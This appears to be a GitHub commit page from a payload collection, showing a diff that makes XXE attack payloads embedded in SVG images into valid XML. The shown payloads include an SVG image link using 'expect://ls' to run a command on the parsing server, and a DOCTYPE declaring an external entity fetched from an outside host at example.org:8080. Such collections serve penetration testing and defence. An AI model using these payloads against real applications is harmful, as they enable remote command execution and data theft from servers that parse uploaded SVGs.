Merge pull request #358 from gregxsunday/master

improved XXE SVG payloads to be valid XMLs
This commit is contained in:
Swissky 2021-04-24 15:40:01 +02:00 committed by GitHub
commit 9753f369e3
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -419,7 +419,7 @@ From https://gist.github.com/infosec-au/2c60dc493053ead1af42de1ca3bdcc79
```xml ```xml
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200"> <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
<image xlink:href="expect://ls"></image> <image xlink:href="expect://ls" width="200" height="200"></image>
</svg> </svg>
``` ```
@ -438,6 +438,7 @@ From https://gist.github.com/infosec-au/2c60dc493053ead1af42de1ca3bdcc79
*xxe.svg* *xxe.svg*
```xml ```xml
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [ <!DOCTYPE svg [
<!ELEMENT svg ANY > <!ELEMENT svg ANY >
<!ENTITY % sp SYSTEM "http://example.org:8080/xxe.xml"> <!ENTITY % sp SYSTEM "http://example.org:8080/xxe.xml">